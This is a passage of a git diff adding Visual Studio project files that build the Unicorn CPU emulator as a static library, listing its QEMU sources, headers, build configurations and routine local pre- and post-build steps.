<Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h"> + <Filter>qemu\include\hw\arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h"> + <Filter>qemu\include\hw\cpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\mcf.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h"> + 
<Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\include\qemu\atomic.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\compiler.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h"> + <Filter>qemu\include\qemu</Filter> + 
</ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\object.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\qom-qobject.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj new file mode 100644 index 0000000..f4e6cb6 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj @@ -0,0 +1,378 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\list.c" /> + <ClCompile Include="..\..\..\qemu\accel.c" /> + <ClCompile Include="..\..\..\qemu\glib_compat.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qemu-log.c" /> + <ClCompile Include="..\..\..\qemu\qemu-timer.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qint.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c" /> + <ClCompile 
Include="..\..\..\qemu\qom\container.c" /> + <ClCompile Include="..\..\..\qemu\qom\cpu.c" /> + <ClCompile Include="..\..\..\qemu\qom\object.c" /> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c" /> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c" /> + <ClCompile Include="..\..\..\qemu\util\aes.c" /> + <ClCompile Include="..\..\..\qemu\util\bitmap.c" /> + <ClCompile Include="..\..\..\qemu\util\bitops.c" /> + <ClCompile Include="..\..\..\qemu\util\crc32c.c" /> + <ClCompile Include="..\..\..\qemu\util\cutils.c" /> + <ClCompile Include="..\..\..\qemu\util\error.c" /> + <ClCompile Include="..\..\..\qemu\util\getauxval.c" /> + <ClCompile Include="..\..\..\qemu\util\host-utils.c" /> + <ClCompile Include="..\..\..\qemu\util\module.c" /> + <ClCompile Include="..\..\..\qemu\util\oslib-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c" /> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c" /> + <ClCompile Include="..\..\..\qemu\vl.c" /> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-types.c" /> + <ClCompile Include="..\qapi-visit.c" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h" /> + <ClInclude Include="..\..\..\include\qemu.h" /> + <ClInclude Include="..\..\..\include\uc_priv.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + <ClInclude Include="..\..\..\qemu\include\config.h" /> + <ClInclude Include="..\..\..\qemu\include\elf.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h" /> + 
<ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\helper-tcg.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h" /> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h" /> + <ClInclude 
Include="..\..\..\qemu\include\hw\m68k\mcf.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\qdev-core.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h" /> + <ClInclude 
Include="..\..\..\qemu\include\qemu\atomic.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\compiler.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\object.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\qom-qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h" /> + <ClInclude Include="..\..\..\qemu\vl.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="..\qapi-types.h" /> + <ClInclude Include="..\qapi-visit.h" /> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm"> + <ExcludedFromBuild 
Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild> + </MASM> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>unicorn_static</RootNamespace> + <ProjectName>unicorn_static</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + 
<PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + 
<IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> 
+ <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy 